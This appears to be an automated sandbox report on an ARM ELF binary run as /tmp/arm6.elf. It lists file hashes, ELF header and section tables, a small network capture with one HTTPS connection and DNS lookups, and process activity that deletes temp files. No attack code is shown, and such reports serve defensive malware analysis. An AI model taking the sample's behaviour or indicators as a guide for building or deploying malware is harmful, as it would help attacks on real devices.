                        SHA512:2ce14ff5b23773457fbc5150832d30659695e5ca879782bef800e1136e6421b7ad6f3a8f9018fc2e2c58b073dee9ebdd89bb1462f54332bf6e7a06854982335d
                        SSDEEP:3072:eGAXfdhktRnsY3OcI8SI4dpWAK8YtNulEvGQhMkdN:eGAXfdhktRnsZeS7KtN0Evbhf
                        TLSH:2FA3F899B8919B6AC5D406BFFE1F818D33231BF8E2DB3103DD186B24768A51A4E3F541
                        File Content Preview:.ELF..............(.....l...4...P.......4. ...(.........T...T...T.......................................................................\H...........................................@-..@............/..@-.,@...0....S..... 0....S.........../..0...0...@..../

                        ELF header

                        Class:ELF32
                        Data:2's complement, little endian
                        Version:1 (current)
                        Machine:ARM
                        Version Number:0x1
                        Type:EXEC (Executable file)
                        OS/ABI:UNIX - System V
                        ABI Version:0
                        Entry Point Address:0x816c
                        Flags:0x4000002
                        ELF Header Size:52
                        Program Header Offset:52
                        Program Header Size:32
                        Number of Program Headers:4
                        Section Header Offset:104016
                        Section Header Size:40
                        Number of Section Headers:13
                        Header String Table Index:12
                        NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                        NULL0x00x00x00x00x0000
                        .initPROGBITS0x80b40xb40x140x00x6AX001
                        .textPROGBITS0x80c80xc80x16af00x00x6AX004
                        .finiPROGBITS0x1ebb80x16bb80x140x00x6AX001
                        .rodataPROGBITS0x1ebcc0x16bcc0x28880x00x2A004
                        .ARM.exidxARM_EXIDX0x214540x194540xc80x00x82AL204
                        .eh_framePROGBITS0x2951c0x1951c0x40x00x3WA004
                        .init_arrayINIT_ARRAY0x295200x195200x40x00x3WA004
                        .fini_arrayFINI_ARRAY0x295240x195240x40x00x3WA004
                        .gotPROGBITS0x2952c0x1952c0x280x40x3WA004
                        .dataPROGBITS0x295540x195540x980x00x3WA004
                        .bssNOBITS0x295f00x195ec0x47880x00x3WA008
                        .shstrtabSTRTAB0x00x195ec0x620x00x0001
                        TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                        DYNAMIC0x194540x214540x214540xc80xc84.31090x4R 0x4.ARM.exidx
                        LOAD0x00x80000x80000x1951c0x1951c6.21900x5R E0x8000.init .text .fini .rodata .ARM.exidx
                        LOAD0x1951c0x2951c0x2951c0xd00x485c3.59320x6RW 0x8000.eh_frame .init_array .fini_array .got .data .bss
                        DYNAMIC0x00x00x00x00x00.00000x7RWE0x4

                        Download Network PCAP: filteredfull

                        • Total Packets: 3
                        • 443 (HTTPS)
                        • 53 (DNS)
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 2, 2025 07:43:08.771858931 CEST57218443192.168.2.1354.247.62.1
                        TimestampSource PortDest PortSource IPDest IP
                        Apr 2, 2025 07:43:15.759027004 CEST4424553192.168.2.131.1.1.1
                        Apr 2, 2025 07:43:15.759072065 CEST5011753192.168.2.131.1.1.1
                        Apr 2, 2025 07:43:15.857350111 CEST53501171.1.1.1192.168.2.13
                        Apr 2, 2025 07:43:15.857471943 CEST53442451.1.1.1192.168.2.13
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Apr 2, 2025 07:43:15.759027004 CEST192.168.2.131.1.1.10xaf3bStandard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
                        Apr 2, 2025 07:43:15.759072065 CEST192.168.2.131.1.1.10xc5fStandard query (0)daisy.ubuntu.com28IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Apr 2, 2025 07:43:15.857471943 CEST1.1.1.1192.168.2.130xaf3bNo error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false
                        Apr 2, 2025 07:43:15.857471943 CEST1.1.1.1192.168.2.130xaf3bNo error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false

                        System Behavior

                        Start time (UTC):05:43:11
                        Start date (UTC):02/04/2025
                        Path:/tmp/arm6.elf
                        Arguments:-
                        File size:4956856 bytes
                        MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                        Start time (UTC):05:43:11
                        Start date (UTC):02/04/2025
                        Path:/usr/bin/dash
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:43:11
                        Start date (UTC):02/04/2025
                        Path:/usr/bin/rm
                        Arguments:rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
                        File size:72056 bytes
                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b

                        Start time (UTC):05:43:11
                        Start date (UTC):02/04/2025
                        Path:/usr/bin/dash
                        Arguments:-
                        File size:129816 bytes
                        MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                        Start time (UTC):05:43:11
                        Start date (UTC):02/04/2025
                        Path:/usr/bin/rm
                        Arguments:rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
                        File size:72056 bytes
                        MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b